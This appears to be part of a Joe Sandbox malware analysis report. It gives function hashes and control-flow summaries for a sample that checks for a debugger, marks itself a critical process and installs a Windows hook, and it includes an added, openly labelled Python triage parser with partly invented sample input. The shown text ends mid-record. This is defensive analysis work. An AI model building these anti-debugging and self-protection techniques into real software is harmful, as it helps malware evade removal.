                                                                                  [Control-flow graph image; entry block 7ffd34817a8b-7ffd34817b2d, calls CheckRemoteDebuggerPresent]
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3426952229.00007FFD34810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34810000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd34810000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CheckDebuggerPresentRemote
                                                                                  • String ID:
                                                                                  • API String ID: 3662101638-0
                                                                                  • Opcode ID: 1f968d0e380239ff8220d14084d44d2886f6eae6967e74473248f7051cc0497e
                                                                                  • Instruction ID: 1bbfd8b61724fcd8aef12b6a9c14021c3590002b005f6e58f0e1e96da61fa9d0
                                                                                  • Opcode Fuzzy Hash: 1f968d0e380239ff8220d14084d44d2886f6eae6967e74473248f7051cc0497e
                                                                                  • Instruction Fuzzy Hash: 5931C231908A1C8FDB68DF98D8866F97BE0EF65311F04412AD489D7241CB74A8568B91

                                                                                  Control-flow Graph

                                                                                  [Control-flow graph image; entry block 7ffd348113cd-7ffd348113d2, no API or internal calls]
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3426952229.00007FFD34810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34810000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd34810000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4M_I
                                                                                  • API String ID: 0-342628054
                                                                                  • Opcode ID: 632dfab0a2809d068e3d847e922577d8a95963cc298076bd8e7ac50e187f2633
                                                                                  • Instruction ID: bff3d982eaa987311b3422b88fdaebde5ec40a9cb9e1bbf5211682f4f57dffe0
                                                                                  • Opcode Fuzzy Hash: 632dfab0a2809d068e3d847e922577d8a95963cc298076bd8e7ac50e187f2633
                                                                                  • Instruction Fuzzy Hash: D3B18443B0EAC61EE753A76C58B50E97FA0EF57265B0902F7C1D9CA093ED0D680AD391

                                                                                  Control-flow Graph

                                                                                  [Control-flow graph image; entry block 7ffd34821a4a-7ffd34821ad5, with calls to 7ffd34810d40, 7ffd3481bbd0, 7ffd3481bbd8, 7ffd34821690 and 7ffd3481ed60]
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3426952229.00007FFD34810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34810000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd34810000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ea58318b3471076e3b4d55a6fb4d81f38756fd7221f56635ec85da3d266db275
                                                                                  • Instruction ID: 9bdc23eeca0b738d66dfa805d0d0041e9909197d604743d74ba29b266f8fafa2
                                                                                  • Opcode Fuzzy Hash: ea58318b3471076e3b4d55a6fb4d81f38756fd7221f56635ec85da3d266db275
                                                                                  • Instruction Fuzzy Hash: E572B630B1CA094FEB64EB6C84AA67977D2FF99341F54467DE44DC32D2DE2CA8418742
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3426952229.00007FFD34810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34810000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd34810000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 50e11348e24d5565f64d28a0239072ee5343b2380655ae7a314aa95686061ccf
                                                                                  • Instruction ID: 835c71c56a4a52dd7651796565a9a9514ca6adb6ba2e2b02adc47c4e861f873e
                                                                                  • Opcode Fuzzy Hash: 50e11348e24d5565f64d28a0239072ee5343b2380655ae7a314aa95686061ccf
                                                                                  • Instruction Fuzzy Hash: C032B361B2CA4A4FEBA8EB6C84A527D77D2FF9D310F44057AE04ED32C6DD28AC419741
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3426952229.00007FFD34810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34810000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd34810000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a82fade97364c555b18b3f3731b554b86105fa6e5ef111f567ae31ce0eb95b35
                                                                                  • Instruction ID: 3e108403f1fda83eaa3af9a20040e981d8a1f42e90e702633cf4860e0b9eb348
                                                                                  • Opcode Fuzzy Hash: a82fade97364c555b18b3f3731b554b86105fa6e5ef111f567ae31ce0eb95b35
                                                                                  • Instruction Fuzzy Hash: 6422C361B1CA494FEBA8EB6C84B56B977D2EF99310F4405BAE04EC32D2DD28AC41D741
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3426952229.00007FFD34810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34810000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd34810000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 44672f644ca5eaeae13a72a4023b9d92019c11b9e63a022cca2c227699991120
                                                                                  • Instruction ID: d7a82a5c8c6381aee8e0882e3042f37738fa1cf88348009d4ad3433e668abd6c
                                                                                  • Opcode Fuzzy Hash: 44672f644ca5eaeae13a72a4023b9d92019c11b9e63a022cca2c227699991120
                                                                                  • Instruction Fuzzy Hash: 4E42D534E085198EEB69EB64C4A57F9B3B1FF49301F1045BAD10EE3292DF396981DB50
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3426952229.00007FFD34810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34810000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd34810000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d688570d0421ec60f9786b4250ed403244a31b22560a4ad1fa0a9c525c4c2ca2
                                                                                  • Instruction ID: f9af913f62708430cf2f8d2c0dac342c5de81a1acb2da63993618d3b3ff2033c
                                                                                  • Opcode Fuzzy Hash: d688570d0421ec60f9786b4250ed403244a31b22560a4ad1fa0a9c525c4c2ca2
                                                                                  • Instruction Fuzzy Hash: C8F19630A08A8D8FEBA8DF28C8557E937E1FF55310F04426EE84DD7295DB78A945CB81
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3426952229.00007FFD34810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34810000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd34810000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4a5e64a1206692f5cba44bc15bde58f3a9e19f5d53cc4f48ff75cc5fe74aa650
                                                                                  • Instruction ID: 75b056c0f350c385b79605347b87d58f6e2b5f13a056bd627a547deb3e20c228
                                                                                  • Opcode Fuzzy Hash: 4a5e64a1206692f5cba44bc15bde58f3a9e19f5d53cc4f48ff75cc5fe74aa650
                                                                                  • Instruction Fuzzy Hash: B2E18430A08A8E8FEBA8DF28C8557E977D1FB55310F14426ED84DC7291DE78A945CB81
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3426952229.00007FFD34810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34810000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd34810000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ae3c9be2d3a50b47f97e3a435d86a6f783ce82c87700a2adeec487bad6bb54c4
                                                                                  • Instruction ID: 455158cf672f4a57780341980abca5a331181078c241012a36e72c3631886e28
                                                                                  • Opcode Fuzzy Hash: ae3c9be2d3a50b47f97e3a435d86a6f783ce82c87700a2adeec487bad6bb54c4
                                                                                  • Instruction Fuzzy Hash: 9951211071E6C90FE796ABB858742767FE5DF87225B1801FBE08DD7193DD181806C342
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3426952229.00007FFD34810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34810000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd34810000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 405ae6b7fc718bc804bfe9428a7b964c1a14183177d18b667d311d5ee22a0411
                                                                                  • Instruction ID: 8c496c253724e92c046d50f07661bc737f6b384c817e4e5e56a865a85bb02830
                                                                                  • Opcode Fuzzy Hash: 405ae6b7fc718bc804bfe9428a7b964c1a14183177d18b667d311d5ee22a0411
                                                                                  • Instruction Fuzzy Hash: 8751A770A18A1D8FDB98EF68D4A5AACB7F1FF59301F104169D01EE7292CF35A881DB40

                                                                                  Control-flow Graph (legend: Executed / Not Executed)
                                                                                  • Block 368: 7ffd3481b10d-7ffd3481b1f0, calls RtlSetProcessIsCritical
                                                                                  • Block 371: 7ffd3481b1f2
                                                                                  • Block 372: 7ffd3481b1f8-7ffd3481b22d
                                                                                  • Edges: 368->371, 368->372, 371->372
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3426952229.00007FFD34810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34810000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd34810000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalProcess
                                                                                  • String ID:
                                                                                  • API String ID: 2695349919-0
                                                                                  • Opcode ID: a0bcdd57146e1e077e1b556baa11c3153b881b2a73aa8d1b0f7db6b646d7586d
                                                                                  • Instruction ID: 46089f4745a293fbd17dbd80b8ebede481b29089891ae6b55ba450f1e2f5d9c3
                                                                                  • Opcode Fuzzy Hash: a0bcdd57146e1e077e1b556baa11c3153b881b2a73aa8d1b0f7db6b646d7586d
                                                                                  • Instruction Fuzzy Hash: AA41233190C6588FD718DF98D845BEABBF0FF56311F04416EE08AC3692CB74A846CB91

                                                                                  Control-flow Graph (legend: Executed / Not Executed)
                                                                                  • Block 374: 7ffd3481b658-7ffd3481b65f
                                                                                  • Block 375: 7ffd3481b661-7ffd3481b669
                                                                                  • Block 376: 7ffd3481b66a-7ffd3481b6dd
                                                                                  • Block 380: 7ffd3481b6e3-7ffd3481b6f0
                                                                                  • Block 381: 7ffd3481b769-7ffd3481b76d
                                                                                  • Block 382: 7ffd3481b6f2-7ffd3481b72f, calls SetWindowsHookExW
                                                                                  • Block 383: 7ffd3481b731
                                                                                  • Block 384: 7ffd3481b737-7ffd3481b768
                                                                                  • Edges: 374->375, 374->376, 375->376, 376->380, 376->381, 380->382, 381->382, 382->383, 382->384, 383->384
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3426952229.00007FFD34810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34810000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd34810000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: HookWindows
                                                                                  • String ID:
                                                                                  • API String ID: 2559412058-0
                                                                                  • Opcode ID: 0419290c483cd7d939c9717c23008cdab2e01e4781b5d8abdd54193ce19b72ab
                                                                                  • Instruction ID: 42ed18ebf3ff73320a51eddd7f0cd7fc7b5ddda45f982e09d7abda4a4ceb6103
                                                                                  • Opcode Fuzzy Hash: 0419290c483cd7d939c9717c23008cdab2e01e4781b5d8abdd54193ce19b72ab
                                                                                  • Instruction Fuzzy Hash: 68410831A1CA5D4FDB18DB6C98566F9BBE1EB69321F00427FE049D3292CA64A852C7C1
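The two control-flow graphs above are the only records in this part of the report whose graph resolves an API name: RtlSetProcessIsCritical in the file.exe function at 7ffd3481b10d (the call behind the "Protects its processes via BreakOnTermination flag" signature) and SetWindowsHookExW in the function at 7ffd3481b658 (the hook type is not visible in the report). The Python below is an added example, not code from Joe Sandbox or from this report: it parses the record layout used on this page (a `control_flow_graph` line followed by the "Memory Dump Source" bullets, closed by "Instruction Fuzzy Hash") into structured records, flags the functions that call those two APIs, and lists Opcode IDs that recur across processes. The sample input is constructed: three records trimmed from the page to the bullets the parser uses, plus one invented process-6 record that reuses a real Opcode ID so the cross-process check has a hit.

```python
"""Parse the Joe Sandbox IDA-plugin function records shown in this report and
flag functions whose control-flow graph calls an API worth a second look.
Added example, not Joe Sandbox code."""
import re
from collections import defaultdict

# Constructed input: three records from the page trimmed to the bullets used
# here, plus an invented process-6 record that reuses a real Opcode ID so the
# cross-process check below has something to find.
SAMPLE_REPORT = """\
control_flow_graph 368 7ffd3481b10d-7ffd3481b1f0 RtlSetProcessIsCritical 371 7ffd3481b1f2 368->371 372 7ffd3481b1f8-7ffd3481b22d 368->372 371->372
Memory Dump Source
• Snapshot File: hcaresult_0_2_7ffd34810000_file.jbxd
• API ID: CriticalProcess
• Opcode ID: a0bcdd57146e1e077e1b556baa11c3153b881b2a73aa8d1b0f7db6b646d7586d
• Instruction Fuzzy Hash: AA41233190C6588FD718DF98D845BEABBF0FF56311F04416EE08AC3692CB74A846CB91
control_flow_graph 374 7ffd3481b658-7ffd3481b65f 375 7ffd3481b661-7ffd3481b669 374->375 376 7ffd3481b66a-7ffd3481b6dd 374->376 375->376 380 7ffd3481b6e3-7ffd3481b6f0 376->380 381 7ffd3481b769-7ffd3481b76d 376->381 382 7ffd3481b6f2-7ffd3481b72f SetWindowsHookExW 380->382 381->382 383 7ffd3481b731 382->383 384 7ffd3481b737-7ffd3481b768 382->384 383->384
Memory Dump Source
• Snapshot File: hcaresult_0_2_7ffd34810000_file.jbxd
• API ID: HookWindows
• Opcode ID: 0419290c483cd7d939c9717c23008cdab2e01e4781b5d8abdd54193ce19b72ab
• Instruction Fuzzy Hash: 68410831A1CA5D4FDB18DB6C98566F9BBE1EB69321F00427FE049D3292CA64A852C7C1
Memory Dump Source
• Snapshot File: hcaresult_2_2_7ffd348d0000_powershell.jbxd
• API ID:
• String ID: X72^
• Opcode ID: 3ae831a1313d9a572183be71aad8a5741d5d9c2d496c783631239a0bd27b8d5d
• Instruction Fuzzy Hash: CAD11632A0FA8D4FEBA5EF6858A55B57BE1EF57310B0802BED54DD70A3DA1CA805C341
Memory Dump Source
• Snapshot File: hcaresult_6_2_7ffd348c0000_powershell.jbxd
• Opcode ID: 3ae831a1313d9a572183be71aad8a5741d5d9c2d496c783631239a0bd27b8d5d
• Instruction Fuzzy Hash: 0000000000000000000000000000000000000000000000000000000000000000
"""

BULLET = re.compile(r"^•\s*([^:]+):\s*(.*)$")
SNAPSHOT = re.compile(r"^hcaresult_(\d+)_(\d+)_([0-9a-f]+)_(.+)\.jbxd$")
HEX_RANGE = re.compile(r"^[0-9a-f]{8,}(?:-[0-9a-f]{8,})?$")
EDGE = re.compile(r"^(\d+)->(\d+)$")

# Triage meaning of the two APIs this report's control-flow graphs resolve.
NOTEWORTHY = {
    "RtlSetProcessIsCritical": "sets BreakOnTermination; killing the process bugchecks the host",
    "SetWindowsHookExW": "installs a Windows hook (type not visible here; WH_KEYBOARD_LL = keystrokes)",
}

def parse_cfg(line):
    """'control_flow_graph <id> <start[-end]> [API ...] <a>-><b> ...' -> (blocks, edges).
    A bare name after a block's address range is an API called from that block."""
    tokens = line.split()[1:]
    blocks, edges, current, i = {}, [], None, 0
    while i < len(tokens):
        tok, m = tokens[i], EDGE.match(tokens[i])
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
        elif tok.isdigit() and i + 1 < len(tokens) and HEX_RANGE.match(tokens[i + 1]):
            current = int(tok)
            blocks[current] = {"range": tokens[i + 1], "apis": []}
            i += 1
        elif current is not None:
            blocks[current]["apis"].append(tok)
        i += 1
    return blocks, edges

def parse_records(text):
    """One dict per function record: the CFG line preceding a record belongs to
    it, bullets become keys, and 'Instruction Fuzzy Hash' closes the record."""
    records, pending_cfg, rec = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("control_flow_graph "):
            pending_cfg = parse_cfg(line)
        elif line == "Memory Dump Source":
            blocks, edges = pending_cfg or ({}, [])
            starts = [int(b["range"].split("-")[0], 16) for b in blocks.values()]
            rec = {"blocks": blocks, "edges": edges,
                   "apis": sorted({a for b in blocks.values() for a in b["apis"]}),
                   "entry": f"{min(starts):x}" if starts else None}
            pending_cfg = None
        elif rec is not None and (m := BULLET.match(line)):
            key, value = m.group(1).strip(), m.group(2).strip()
            if key == "Snapshot File" and (s := SNAPSHOT.match(value)):
                # hcaresult_<process>_<dump>_<base>_<image>.jbxd
                rec.update(process=int(s.group(1)), base=int(s.group(3), 16), image=s.group(4))
            rec[key.lower().replace(" ", "_")] = value
            if key == "Instruction Fuzzy Hash":
                records.append(rec)
                rec = None
    return records

def noteworthy_functions(records):
    """Functions whose CFG calls an API in NOTEWORTHY, with the triage note."""
    return [{"image": r.get("image"), "process": r.get("process"), "entry": r["entry"],
             "api": api, "why": NOTEWORTHY[api], "opcode_id": r.get("opcode_id")}
            for r in records for api in r["apis"] if api in NOTEWORTHY]

def shared_opcode_ids(records):
    """Opcode IDs seen in more than one process: the same function body in
    several dumps, e.g. a payload injected into each spawned child."""
    seen = defaultdict(set)
    for r in records:
        if "opcode_id" in r and "process" in r:
            seen[r["opcode_id"]].add(r["process"])
    return {k: sorted(v) for k, v in seen.items() if len(v) > 1}
```

Run `noteworthy_functions(parse_records(SAMPLE_REPORT))` to get the two file.exe functions with their triage notes, and `shared_opcode_ids(...)` for the duplicated Opcode ID. Two caveats when applying this to the full report: RtlSetProcessIsCritical only succeeds when the caller holds SeDebugPrivilege, so the flag alone does not prove the sample ran elevated, and the SetWindowsHookExW hook type (and therefore whether it is a keylogger) has to be confirmed from the decompiled .NET code, not from the graph.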
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3426952229.00007FFD34810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34810000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd34810000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 12524d5394a811daccacad51970dd13a0c63a1d4fa0e9a7d7f5832399fdabd23
                                                                                  • Instruction ID: 871de59a57886f6cddfd0f30ce308db281b3fa2a4cb3dd53a2a34268668f9c69
                                                                                  • Opcode Fuzzy Hash: 12524d5394a811daccacad51970dd13a0c63a1d4fa0e9a7d7f5832399fdabd23
                                                                                  • Instruction Fuzzy Hash: D351C217B0E9765AE73277F9B8A55EE7B14DF42371B0842B7D14C9A0838D082489C7D5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2226235042.00007FFD34800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34800000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ffd34800000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d6a777e7a1dd3d88e1aebddeaa2e33d2eb77ecbb96ed7a5115dd789479f5e366
                                                                                  • Instruction ID: bb10e3fd5b2ab5269110c0aeaf2e8e6c90ee0af0e6bf52508e1d5ea6986bb546
                                                                                  • Opcode Fuzzy Hash: d6a777e7a1dd3d88e1aebddeaa2e33d2eb77ecbb96ed7a5115dd789479f5e366
                                                                                  • Instruction Fuzzy Hash: 89810067B1D9895BF722AB6C98F70EA37D4DF13325B4802B2C948CE093FD1D18579641
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2226608515.00007FFD348D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ffd348d0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: X72^
                                                                                  • API String ID: 0-1870275526
                                                                                  • Opcode ID: 3ae831a1313d9a572183be71aad8a5741d5d9c2d496c783631239a0bd27b8d5d
                                                                                  • Instruction ID: 20a79516a7513b85afe316ae8076a4648b1da270903caffb1760f912ca48bbfb
                                                                                  • Opcode Fuzzy Hash: 3ae831a1313d9a572183be71aad8a5741d5d9c2d496c783631239a0bd27b8d5d
                                                                                  • Instruction Fuzzy Hash: CAD11632A0FA8D4FEBA5EF6858A55B57BE1EF57310B0802BED54DD70A3DA1CA805C341
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2226235042.00007FFD34800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34800000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ffd34800000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b88fa319b68bb9eba1ecf88f3885691e007ecd62a69ae96ef4d35df256435836
                                                                                  • Instruction ID: 22b4e57e9229856d74091850fa24d7dc9c4905c55d27ad21815b4572b9737aa3
                                                                                  • Opcode Fuzzy Hash: b88fa319b68bb9eba1ecf88f3885691e007ecd62a69ae96ef4d35df256435836
                                                                                  • Instruction Fuzzy Hash: E0412772A1CB485FDB589F5C98966F97BE0FF95311F40412FE449C3292DB25A806CBC2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2225831045.00007FFD346ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346ED000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ffd346ed000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d3de1977500f5134d127149c81ff3170875583d39b39c4d2f253f14e24f7ee8c
                                                                                  • Instruction ID: a2f996bc03c03aad8b756d7a328b6c3a3a8daf0c2bb8591fcf4def81f27a8d72
                                                                                  • Opcode Fuzzy Hash: d3de1977500f5134d127149c81ff3170875583d39b39c4d2f253f14e24f7ee8c
                                                                                  • Instruction Fuzzy Hash: 9E41D37190DBC44FE7568F28D8959A63FF0EF53324B1905EFD088CB1A3D629A846C792
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2226235042.00007FFD34800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34800000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ffd34800000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3d5beb88d582fe357f6f26e7fabf5984305a78b6e799c6ec6efde2aced8bae57
                                                                                  • Instruction ID: 64ee419af071f3169e0d633d8949cd0ac113cd1bd1b7da37a83e61416ecc2e4d
                                                                                  • Opcode Fuzzy Hash: 3d5beb88d582fe357f6f26e7fabf5984305a78b6e799c6ec6efde2aced8bae57
                                                                                  • Instruction Fuzzy Hash: 9621FB3190CB4C4FDB59DF9C988A7E97BE0EFA6321F04416BD049C3152DA74945ACB91
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2226235042.00007FFD34800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34800000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ffd34800000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                  • Instruction ID: ee10ff1c4a4bc8693cad707e4683dde159bb38e644a1751304e2bda521ebd88d
                                                                                  • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                  • Instruction Fuzzy Hash: 3801677121CB0C4FD744EF0CE491AA6B7E0FB95364F10056DE58AC3655DA36E882CB45
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2226608515.00007FFD348D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ffd348d0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: cd6110cfbe50656e84ff76e70b277e360336a2b4e321edce097364a8e7931bd3
                                                                                  • Instruction ID: a0d38defd636366f1444821ef71b84fcd07256131c818be2d8a679d1a3948ccd
                                                                                  • Opcode Fuzzy Hash: cd6110cfbe50656e84ff76e70b277e360336a2b4e321edce097364a8e7931bd3
                                                                                  • Instruction Fuzzy Hash: E6F0BE32B0EA048FDB68EB4CE4904A8B3F0EF5A320B1500BAE15DC7163CA2AEC40C740
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2226608515.00007FFD348D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ffd348d0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3144911cc94bf35522688d59fc51ff9de21d45b62c33701fb0689716fe6bad20
                                                                                  • Instruction ID: 1cea30166ac7c3ff8ea135978f8ab7dce45c55b714242a06cb367b969fff99e2
                                                                                  • Opcode Fuzzy Hash: 3144911cc94bf35522688d59fc51ff9de21d45b62c33701fb0689716fe6bad20
                                                                                  • Instruction Fuzzy Hash: D7F0BE32A4F5448FDB54EB4CE0948A8B3E0FF0632474100B6E14DCB063DA2AAC80C740
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2226608515.00007FFD348D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ffd348d0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                  • Instruction ID: fef8a597badc8d47bf1ed5b600dc0c892f0a73fff92204a899e8d578ed342c89
                                                                                  • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                  • Instruction Fuzzy Hash: C8E04F31B0D8189FDA68DB0CE0909E9B3E1EF9E331B1102B7D24EC7561CA26EC51DB80
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2226235042.00007FFD34800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34800000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ffd34800000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: M_^4$M_^7$M_^F$M_^J
                                                                                  • API String ID: 0-622050427
                                                                                  • Opcode ID: 0952385b8bdb8dc4856a798c81327935ad6e11df2551058c8feb274a0171bac6
                                                                                  • Instruction ID: aa8ee28e823be06e0a9b00e8ebcb7becbcc6c7811fb0ab8f80e6bd92b873606f
                                                                                  • Opcode Fuzzy Hash: 0952385b8bdb8dc4856a798c81327935ad6e11df2551058c8feb274a0171bac6
                                                                                  • Instruction Fuzzy Hash: 732104B7708865AEE3227BBDB8149EE3744CF9423478507B2E19CDB083F91864C68AC0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2378048720.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7ffd348c0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8c45b002eb79a94e5eadc05794dbd042de9968a7d811f45496f4f6bb97361cb4
                                                                                  • Instruction ID: 4f61130744aa58bd16d7438a426a2bd617687c07d52065023e83a35b81fdfcae
                                                                                  • Opcode Fuzzy Hash: 8c45b002eb79a94e5eadc05794dbd042de9968a7d811f45496f4f6bb97361cb4
                                                                                  • Instruction Fuzzy Hash: EFD12772A0EA894FEBA5AB6848B56B5BBD0EF56314F0801FFD54DD70A3DA18AC05C341
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2378048720.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7ffd348c0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
